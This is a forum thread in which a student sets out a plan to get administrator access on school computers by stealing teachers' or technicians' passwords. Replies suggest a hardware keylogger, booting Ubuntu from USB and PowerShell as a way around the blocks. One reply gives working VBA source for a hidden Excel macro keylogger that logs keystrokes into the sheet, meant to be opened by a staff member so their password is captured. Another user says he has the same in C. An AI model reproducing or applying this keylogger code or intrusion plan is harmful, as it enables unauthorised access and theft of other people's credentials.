Need help with school Security System
I know a lot about my schools security system and how it works I will bullet point everything I know. My aim is to obtain admin privileges or change my user privileges to that of an admins.
-The BIOS system is set up to boot of the hard drive with the operating system on it.
-The BIOS system has a password on it.
-The battery in the motherboard, that if you take out will erase the BIOS password, has two jumper pins either side of the battery so if it is tried to be removed the jumper pins will contact and break the computer. The school will then make you pay for a new one.
-The School uses it’s own proxy server for web filtering
-The school uses Symantec software
-The School uses the operating system Windows XP professional.
-All web browsers apart from internet explorer 7 have been blocked.
-CMD is disallowed
-notepad is disallowed
-you can not run . bat files
-You can not access the C drive. Only FTP (file transfer protocol ) servers.
-The maximum of disk space on my user area is 900mb.
I think that is about it. also one more thing. There used to be a technician who worked in my school. he has left the school and he now runs his own business and fixes our computers at home. I have asked him for the BIOS password the password has been changed since. he explained to me that the best way to overcome the problem was to use HARDWARE rather than software to obtain an admin’s password. (All senior members of staff are classed as admins I.E teachers and technicians).
A stupid question but what about USB sticks and files on the USB stick? Can you run files from that? Like *.exe?
If so a keylogger would be the easiest way I guess.. but I doubt that it would be possible since they blocked so much.
A stupid question because they seem to pretty much block everything so I can guess that ;)
Now I wonder what you are doing on the PC for school.. I mean you cannot program there and won’t be able to run a file from USB or something..? Glad that my school allows everything and you can boot ubuntu if you want..
That is true, but here is the link to that thing I found you put it between the keyboard and the computer an is totally undetectable.
Yea sounds nice. But I’d still like to know what you are usually doing on the school PC
Just writing and stuff like that?
Well doesn’t look that nice if you want to run some script there.. So a keylogger might be the easiest way…
I asked the same question on here not to long ago and the best answer I got was to boot ubunto from a USB and use that to get admin, in replace of CMD that is.
If the ship is crashing chill, just hit F5
That’s the answer I give to the most d:
But since they block so much on his school I asked if you can run something from the USB stick.. So you cannot use this way..
@Zoino, check to see if they have blocked “ Windows Power shell. if it’s not blocked send me a friend request and i will share you what i know.
As I walk through the valley of the shadow of death, I will fear no evil, for I am the Evilest mother fucker in the God damn valley.
Do they have Macro enabled in the Microsoft Office applications? If so you could use something like a Macro keylogger in an Excel spreadsheet and get a teacher/technician to open the file. The hard bit would be getting them to type their password in (as they or you would already be logged in).
Something like this maybe
‘declare some variables that we are going to need later
Dim i, e As Long
Dim s As String
Dim b As Integer
Dim result As Long
‘the declaration allows us to call a function in the User32.dll that will tell us what key is pressed
Public Declare Function GetAsyncKeyState Lib “User32” (ByVal vKey As Long) As Long
‘to run the key logger you will run the macro called loK
Sub loK()
e = 1
b = 0
'we can hide the Excel application from view to hide the key logger
Application.Visible = False
'the amount of time the key logger will run for
f = Now() + TimeValue(“00:00:15”)
‘this loop will stop when the time above run out
Do While Now() < f
'the GetAsyncKeyState function will return a value of -32767 for any key that is pressed
'we cycle thru all 255 possible keys to check which one has a value of -32767
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
'if we find a key that is pressed we attach to our string
If result = -32767 Then s = s + Chr$(i)
Next i
'every time we collect 100 characters we right them to a new column in the Excel sheet
If Len(s) = 100 Then
Cells(e, 1).Value = s
'each batch of 100 characters are written to a new row
e = e + 1
s = “”
End If
‘when the time we set above expires we write the remaing characters to a new row
Cells(e, 1).Value = s
s = “”
’ we bring the Excel application to view so we can see the log of charaters
Application.Visible = True
End Sub
Got the same in C usually there are some problems with caps lock and some combinations.
And I think it’s easier to check whether the result of AsyncKeyState is NOT equal to 0 then to check if it’s -32767
But in the end it’s the same d:
Hi guys I have a questio, how can I enable a USB port on school computer. In our school computers have Pc Virtua 07 an run win xp, and if I go to CMD and tipe “regedit” I find myself in a regestry editor where usually at home I can enable or disable the USB port but at school is missing one file called USBTOR. Now has someone an idea how can I get this file to enable USB port or is there any other option that allow you to enable it. Thanks seeyaa